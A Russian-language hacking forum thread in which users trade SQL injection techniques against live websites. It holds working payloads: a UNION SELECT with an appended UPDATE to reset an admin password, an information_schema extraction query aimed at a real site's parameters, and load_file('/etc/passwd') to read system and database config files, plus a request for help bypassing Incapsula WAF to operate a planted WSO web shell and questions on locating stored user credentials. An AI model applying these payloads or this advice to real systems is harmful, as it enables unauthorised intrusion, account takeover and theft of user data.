вот так? http://site.ru/index.php?id=123'+UNION+SELECT+1,2,3,admin,5,6,7,8,9,10,11,12,13,14,15,16,17,18 UPDATE 'admin' SET 'password' = '123' WHERE username='admin'+--+
тебе ж сказали, в майскул разделение запросов работать небудет, ты хоть читаешь что тебе пишут или нет?
Подскажите какая веб-уязвимости сейчас являются наиболее распространенными? Очень хочется начать изучать веб-уязвимости, но естественно хочу начать с актуального и распространенного.
Сбербанк, С count(*) сложнее, но данные можно выводить: Code: lan=3&pid=0%26(([COLOR=Yellow]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21[/COLOR])>(SELECT*FROM([COLOR=DarkOrange]SELECT*FROM information_schema.tables LIMIT 1[/COLOR])a1 WHERE @:=[COLOR=Red]ascii(mid(TABLE_SCHEMA,1,1))[/COLOR]))UNION(SELECT @)&type_id=2&raznovid=2&num_set=undefined Возвращает код первого символа имени базы данных. Остаться выяснить ограничение длины у фильтра на число и можно приступать. sabe, Здесь нормальный вывод, не blind. Если у вас получиться упростить запрос - это хорошо, но на некоторых запросах БД может надолго зависнуть, осторожно.
Доброго времени суток ачатовцы! подскажите как обойти Incapsula WAF есть шелл WSO. Пытаясь его открыть, когда как, то пускает, то нет, но оказавшись внутри не могу ничего исполнить сразу ловлю бан. Админки прикрыли, так что шелл последняя зацепка. может быть кто нибудь сталкивался с этим зверем и есть решение? судя по отчету сравнительного тестирования Incapsula WAF vs CloudFlare пробелы в защите имеются ХЭЭЭЛППП МИ!!! p.s Эта хрень таскает по всему сайту свои кукисы, может быть валидность вызываемых страниц сайта завязана на поле Referer и этих куках
Code: https://e-pay.by/https://e-pay.by/?invaliduser https://e-pay.by/https://e-pay.by/ https://e-pay.by/https://e-pay.by/news?page=9 что это такое?
Добрый день! Пытаюсь посмотреть, есть ли файловые привилегии у юзера, но пишет, мол в доступе отказано.
Как можно записать, чтобы значение было больше определнного.. К примеру where value=больше50 Что то понять не могу как это записать
Посмотрел скуль в личке, все просто))) там просто нет доступа к mysql.user, по этому и нет файловых привилегий! модераторы, почистите от оффтопа
Есть у меня ссылка одна, там есть sql injection, раскрутил, узнал имена бд, лезу в бд а там какие-то тех. данные и больше ничего. На самом сайте есть форма авторизации для зареганых пользователей, а вот куда ихние данные могут записываться?
Необязательно, можно попробовать load_file('/etc/passwd'), если сработает можно попробовать прочитать конфиги мускула и тд